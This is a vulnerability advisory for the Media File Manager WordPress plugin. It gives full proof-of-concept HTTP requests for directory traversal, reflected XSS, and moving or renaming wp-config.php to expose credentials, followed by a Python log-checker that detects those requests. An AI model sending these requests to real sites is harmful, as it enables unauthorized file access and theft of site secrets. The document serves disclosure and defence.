wpvulndb
Pasquale Turi
WPVDB-ID: 1236335E-EC15-4E43-B9C4-3BA1363E87AF
History: Nov 05, 2018 - 12:00 a.m.

Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities

2018-11-05 00:00:00
Pasquale Turi
wpscan.com
8

EPSS: 0.002 (Low), Percentile: 56.0%

As the PoC shows, the vulnerabilities can be combined to obtain PHP code execution and to read sensitive files. By default the File Manager can only be used by Administrator users; however, any user role can be configured to use it.

PoC

Directory Traversal:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: REDACTED
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Connection: close
Cookie: REDACTED

action=mrelocator_getdir&dir=../../../../../../../etc

Reflected XSS:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: close
Cookie: REDACTED

action=mrelocator_getdir&dir=[XSS]

Move any file to any dir:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: REDACTED

action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php

Rename any file:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 97
Connection: close
Cookie: REDACTED

action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt
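For detection, the request shapes in the PoC can be matched in logged admin-ajax.php POST bodies. The following Python check is an added example, not part of the advisory or the plugin's code; it assumes request bodies are captured (for example by a WAF or audit log), and the function names, finding labels and PHP extension list are hypothetical choices.

```python
from urllib.parse import parse_qs, unquote

PATH_PARAMS = ("dir", "dir_from", "dir_to")
NAME_PARAMS = ("items", "from", "to")
PHP_EXTS = ("php", "phtml", "phar")  # assumed list of PHP-handled extensions

def _decode(value):
    # Undo repeated percent-encoding so %252e%252e is still seen as '..'
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def _is_php(name):
    return "." in name and name.lower().rsplit(".", 1)[-1] in PHP_EXTS

def inspect_body(body):
    """Return findings for one form-encoded admin-ajax.php POST body."""
    raw = parse_qs(body, keep_blank_values=True)
    params = {k: _decode(v[0]) for k, v in raw.items()}
    action = params.get("action", "")
    if not action.startswith("mrelocator_"):
        return []
    findings = []
    for key in PATH_PARAMS + NAME_PARAMS:
        value = params.get(key, "")
        if ".." in value.split("/"):            # parent-directory segment
            findings.append(f"traversal:{key}")
        if any(c in value for c in "<>\"'"):    # markup reflected via dir
            findings.append(f"markup:{key}")
    if action == "mrelocator_rename":
        # Renaming across the PHP/non-PHP boundary exposes or executes a file
        if _is_php(params.get("from", "")) != _is_php(params.get("to", "")):
            findings.append("php-extension-change")
    if action == "mrelocator_move" and _is_php(params.get("items", "")):
        findings.append("php-file-moved")
    return findings

# First three bodies are the advisory's PoC bodies; the last is constructed.
SAMPLES = [
    "action=mrelocator_getdir&dir=../../../../../../../etc",
    "action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php",
    "action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt",
    "action=mrelocator_getdir&dir=2018/11/",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_body(body) or "clean", "<-", body)
```

The same conditions (no `..` segment, no markup characters, no extension change across the PHP boundary) are what a server-side fix would need to enforce before touching the filesystem.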

CPE
Name                 Operator   Version
media-file-manager   eq         *

